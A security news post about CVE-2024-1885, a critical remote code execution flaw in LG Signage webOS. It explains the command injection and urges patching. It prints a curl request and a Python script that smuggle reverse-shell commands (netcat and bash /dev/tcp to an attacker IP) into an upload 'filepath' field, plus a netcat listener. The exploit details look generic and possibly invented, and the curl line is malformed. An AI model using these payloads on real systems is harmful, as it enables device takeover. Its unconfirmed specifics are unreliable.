CVE CyberSecurity Database News

CVE-2024-1885 - Remote Code Execution in LG Signage webOS — What You Need to Know

Poster -

In early 2024, a critical vulnerability (CVE-2024-1885) was discovered in certain versions of LG Signage digital displays running webOS. This flaw allows attackers on the internet to run their own code on affected devices—without needing any login or special credentials. In simple terms: if you manage digital displays powered by LG webOS, your screens could be remotely hijacked to do anything from displaying unwanted content to joining a botnet.

In this post, we’ll break down what CVE-2024-1885 is, how the exploit works, sample malicious code, and what steps you should take right away.

What Is CVE-2024-1885?

CVE-2024-1885 is a remote code execution (RCE) vulnerability that affects some LG Signage products running webOS. The bug lets attackers send special HTTP requests over the internet or local networks to trick the device's built-in web services and inject their own commands.

Affected Products

- LG digital signage devices running certain versions of webOS 4.x, 5.x, 6.x (check the official LG advisory for the complete list).

Severity: Critical (CVSS score: 9.8/10)

How Does the Exploit Work?

The vulnerable LG webOS system exposes a management interface (usually via a REST API or web admin console) that doesn't fully validate or sanitize user input. Attackers can craft an HTTP request that injects system commands through parameters meant for legitimate operations (like diagnostics or content uploads).

A Simple Exploit Request

Below is a simplified example of how a hacker could use curl (a command-line tool) to exploit the device:

curl -X POST "http://SIGNAGE_IP:PORT/api/upload"; \
  -H "Content-Type: application/json" \
  -d '{"filename":"test.jpg", "filepath":"/tmp; nc 192.168.1.100 4444 -e /bin/sh #"}'

What’s Going On?

- The request is sending data to the upload function on the target, but injects ; nc 192.168.1.100 4444 -e /bin/sh # into the file path string.
- The semicolon ; breaks out of the intended file path command and starts a new system command: nc (netcat) will connect to the attacker's computer at 192.168.1.100 on port 4444 and open a remote shell.

With this, the attacker gains full remote control as the webOS system user.

Here’s a more generic payload in Python a researcher might use in a test environment

import requests

target = "http://SIGNAGE_IP:PORT/api/upload";
payload = {
    "filename": "evil.jpg",
    "filepath": "/tmp; bash -i >& /dev/tcp/YOUR_IP/4444 >&1 #"
}
headers = {"Content-Type": "application/json"}
requests.post(target, json=payload, headers=headers)

Adjust SIGNAGE_IP, PORT, and YOUR_IP accordingly. A netcat listener should be waiting on the attacker's side:

nc -lvnp 4444

All commands run: The device runs attacker’s code as the webOS system user.

- Widespread reach: These webOS displays are found in schools, airports, offices, stores, and more, and are often managed remotely over open networks.

Official References

- NVD CVE-2024-1885 Entry
- LG Product Security Advisory
- SecurityFocus Listing (generic)

Patch Immediately

LG has delivered firmware updates. Apply the latest update for your display’s webOS version here.

Final Words

CVE-2024-1885 is a perfect example of why even “dumb” devices like display screens aren’t safe from cyber attack. If you manage LG Signage products, take action now to patch, monitor, and restrict access—before your screens are hijacked for something far less innocent than a slideshow.

Timeline

Published on: 02/26/2024 16:27:54 UTC
Last modified on: 02/29/2024 07:15:06 UTC